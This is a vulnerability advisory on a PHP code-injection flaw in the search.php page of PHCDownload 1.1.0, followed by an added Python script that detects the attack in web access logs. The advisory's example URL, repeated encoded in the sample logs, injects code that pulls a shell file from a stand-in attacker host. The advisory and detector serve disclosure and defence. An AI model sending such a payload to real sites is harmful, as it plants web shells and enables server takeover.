PHCDownload 1.1.0 Vulnerabilities

2009.02.21
Credit: vnbrain
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

A file content management and manipulation system unlike any other available on the market today, with unique innovations, tools, and design, customising and producing your database is made easy. PHCDownload has been designed for integration into existing websites with its highly customisable interface and editable language file system.

Vendor: http://www.phpcredo.com
Version: 1.1.0 and older
Vulnerable file: search.php
Description: It is like remote file inclusion, but you can run PHP code from the browser address. I don't know what it is called.

Exploit: http://[site]/[path_to_script]/search.php
Input: ">< <?php PHP code here ?>
Example: http://[site]/[path_to_script]/search.php?string=">< <?php include("http://attacker_site/SHELL_FILE"); ?>
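A detection check for the request shape in the advisory's example, added here and not part of the original advisory: it scans web-server access logs for PHP tags or a remote include in the string parameter of search.php. The combined log format, the /phcdownload/ install path and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
PHP_TAG_RE = re.compile(r"<\?")  # "<?php", "<?=" and short "<?" tags
REMOTE_INCLUDE_RE = re.compile(
    r"\b(?:include|require)(?:_once)?\s*\(?\s*[\"'](?:https?|ftp)://", re.I)

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding (%253C -> %3C -> <)."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_line(line):
    """Return findings for one access-log line; empty list if nothing matched."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    target = urlsplit(m.group(1))
    if not target.path.lower().endswith("/search.php"):
        return []
    findings = []
    for raw in parse_qs(target.query, keep_blank_values=True).get("string", []):
        value = fully_decode(raw)  # parse_qs has already decoded once
        if PHP_TAG_RE.search(value):
            findings.append("php-open-tag")
        if REMOTE_INCLUDE_RE.search(value):
            findings.append("remote-include")
    return findings

# Constructed sample log lines (documentation IP ranges, assumed /phcdownload/ path).
SAMPLE_LOG = [
    '192.0.2.10 - - [21/Feb/2009:10:00:01 +0000] "GET /phcdownload/search.php?string=driver+update HTTP/1.1" 200 5120',
    '203.0.113.7 - - [21/Feb/2009:10:02:13 +0000] "GET /phcdownload/search.php?string=%22%3E%3C+%3C%3Fphp+include(%22http://attacker_site/SHELL_FILE%22)%3B+%3F%3E HTTP/1.1" 200 4800',
    '203.0.113.7 - - [21/Feb/2009:10:02:40 +0000] "GET /phcdownload/search.php?string=%2522%253E%253C%2520%253C%253Fphp%2520echo%25201%253B%2520%253F%253E HTTP/1.1" 200 4800',
]

def scan(lines):
    """Return (line_number, findings) for every line with at least one finding."""
    hits = [(n, inspect_line(l)) for n, l in enumerate(lines, 1)]
    return [(n, f) for n, f in hits if f]

if __name__ == "__main__":
    for n, f in scan(SAMPLE_LOG):
        print(n, ",".join(f))
```

Access logs only show query strings, so a string value sent in a POST body needs request-body logging to be visible to this check.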

References:

http://seclists.org/bugtraq/2009/Feb/0174.html



Copyright 2024, cxsecurity.com